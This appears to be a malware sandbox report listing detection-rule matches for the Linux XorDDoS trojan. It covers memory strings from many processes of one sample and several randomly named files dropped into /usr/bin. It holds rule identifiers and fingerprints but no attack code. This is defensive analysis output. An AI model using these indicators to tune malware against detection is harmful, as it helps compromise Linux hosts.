Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6367, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6369, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6372, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6375, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6381, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6386, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6388, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6391, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6394, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6400, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6403, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6405, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6408, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6410, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6417, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6420, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6422, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6425, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6428, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6435, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6438, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6440, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6443, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6446, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6452, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6455, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6457, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6460, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6463, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6471, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6474, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6476, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6479, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6482, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6488, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6491, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6493, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6496, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6498, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6505, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6508, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6510, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6513, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6516, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/sosfbbrzmx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/sosfbbrzmx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/sosfbbrzmx, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/uhjkqkcgma, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/uhjkqkcgma, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/uhjkqkcgma, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/vnihfmehfy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/vnihfmehfy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/vnihfmehfy, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/oigyzaiygp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/oigyzaiygp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/oigyzaiygp, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/otlzwyqefc, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/otlzwyqefc, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/otlzwyqefc, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/ksagqhmoao, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/ksagqhmoao, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/eqoogeqyds, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/eqoogeqyds, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/ksagqhmoao, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/eqoogeqyds, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wutujskjnm, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/wutujskjnm, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/wutujskjnm, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/qxzsiorokf, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/qxzsiorokf, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/qxzsiorokf, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/gphlkawhxw, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/gphlkawhxw, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/gphlkawhxw, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
